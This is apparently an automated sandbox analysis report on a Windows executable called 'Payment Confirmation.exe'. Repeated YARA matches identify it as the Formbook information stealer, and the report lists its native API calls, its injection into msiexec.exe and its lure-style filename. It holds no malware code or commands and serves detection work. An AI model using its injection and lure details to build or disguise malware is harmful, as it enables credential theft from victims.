Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Payment Confirmation.exe
Executable has a suspicious name (potential lure to open the executable)
Source: Payment Confirmation.exe Static file information: Suspicious name
Uses 32bit PE files
Source: Payment Confirmation.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_004030FB
Detected potential crypto function
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004047D3 1_2_004047D3
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004061D4 1_2_004061D4
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10008856 1_2_10008856
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10003D10 1_2_10003D10
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10011101 1_2_10011101
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000F922 1_2_1000F922
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100119CC 1_2_100119CC
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100059D1 1_2_100059D1
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001AA08 1_2_1001AA08
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001AA17 1_2_1001AA17
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000B25E 1_2_1000B25E
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000FE94 1_2_1000FE94
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10005EC5 1_2_10005EC5
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100062DD 1_2_100062DD
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10006712 1_2_10006712
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10006B47 1_2_10006B47
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000F3B0 1_2_1000F3B0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B8B3 4_2_0041B8B3
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041D1E9 4_2_0041D1E9
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041C983 4_2_0041C983
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041D247 4_2_0041D247
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041D352 4_2_0041D352
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CB6E 4_2_0041CB6E
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CBE6 4_2_0041CBE6
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041C3B0 4_2_0041C3B0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00408C4B 4_2_00408C4B
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00408C90 4_2_00408C90
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CCB8 4_2_0041CCB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F841F 11_2_044F841F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1002 11_2_045A1002
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FB090 11_2_044FB090
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B1D55 11_2_045B1D55
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EF900 11_2_044EF900
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E0D20 11_2_044E0D20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FD5E0 11_2_044FD5E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04506E30 11_2_04506E30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451EBB0 11_2_0451EBB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046D1E9 11_2_0046D1E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046C983 11_2_0046C983
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046D247 11_2_0046D247
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046D352 11_2_0046D352
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CB6E 11_2_0046CB6E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CBE6 11_2_0046CBE6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00458C4B 11_2_00458C4B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00458C90 11_2_00458C90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CCB8 11_2_0046CCB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00452D89 11_2_00452D89
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00452D90 11_2_00452D90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00452FB0 11_2_00452FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 044EB150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004185D0 NtCreateFile, 4_2_004185D0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00418680 NtReadFile, 4_2_00418680
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00418700 NtClose, 4_2_00418700
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004187B0 NtAllocateVirtualMemory, 4_2_004187B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529840 NtDelayExecution,LdrInitializeThunk, 11_2_04529840
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529860 NtQuerySystemInformation,LdrInitializeThunk, 11_2_04529860
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529540 NtReadFile,LdrInitializeThunk, 11_2_04529540
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_04529910
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045295D0 NtClose,LdrInitializeThunk, 11_2_045295D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045299A0 NtCreateSection,LdrInitializeThunk, 11_2_045299A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A50 NtCreateFile,LdrInitializeThunk, 11_2_04529A50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045296D0 NtCreateKey,LdrInitializeThunk, 11_2_045296D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_045296E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529710 NtQueryInformationToken,LdrInitializeThunk, 11_2_04529710
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529FE0 NtCreateMutant,LdrInitializeThunk, 11_2_04529FE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529780 NtMapViewOfSection,LdrInitializeThunk, 11_2_04529780
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452B040 NtSuspendThread, 11_2_0452B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529820 NtEnumerateKey, 11_2_04529820
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045298F0 NtReadVirtualMemory, 11_2_045298F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045298A0 NtWriteVirtualMemory, 11_2_045298A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529950 NtQueueApcThread, 11_2_04529950
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529560 NtWriteFile, 11_2_04529560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452AD30 NtSetContextThread, 11_2_0452AD30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529520 NtWaitForSingleObject, 11_2_04529520
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045299D0 NtCreateProcessEx, 11_2_045299D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045295F0 NtQueryInformationFile, 11_2_045295F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529650 NtQueryValueKey, 11_2_04529650
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529670 NtQueryInformationProcess, 11_2_04529670
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529660 NtAllocateVirtualMemory, 11_2_04529660
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529610 NtEnumerateValueKey, 11_2_04529610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A10 NtQuerySection, 11_2_04529A10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A00 NtProtectVirtualMemory, 11_2_04529A00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A20 NtResumeThread, 11_2_04529A20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A80 NtOpenDirectoryObject, 11_2_04529A80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529770 NtSetInformationFile, 11_2_04529770
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452A770 NtOpenThread, 11_2_0452A770
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529760 NtOpenProcess, 11_2_04529760
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452A710 NtOpenProcessToken, 11_2_0452A710
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529B00 NtSetValueKey, 11_2_04529B00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529730 NtQueryVirtualMemory, 11_2_04529730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452A3B0 NtGetContextThread, 11_2_0452A3B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045297A0 NtUnmapViewOfSection, 11_2_045297A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004685D0 NtCreateFile, 11_2_004685D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00468680 NtReadFile, 11_2_00468680
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00468700 NtClose, 11_2_00468700
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004685CA NtCreateFile, 11_2_004685CA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046867A NtReadFile, 11_2_0046867A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00468623 NtReadFile, 11_2_00468623
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004686FA NtClose, 11_2_004686FA
Sample file is different than original file name gathered from version info
Source: Payment Confirmation.exe, 00000001.00000003.361229670.000000000F196000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000004.00000002.438024069.0000000000C0F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000004.00000002.438309815.0000000000E6F000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemsiexec.exeX vs Payment Confirmation.exe
PE file contains strange resources
Source: Payment Confirmation.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: Payment Confirmation.exe Virustotal: Detection: 24%
Source: Payment Confirmation.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\Payment Confirmation.exe File read: C:\Users\user\Desktop\Payment Confirmation.exe
Source: Payment Confirmation.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Payment Confirmation.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Users\user\Desktop\Payment Confirmation.exe Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
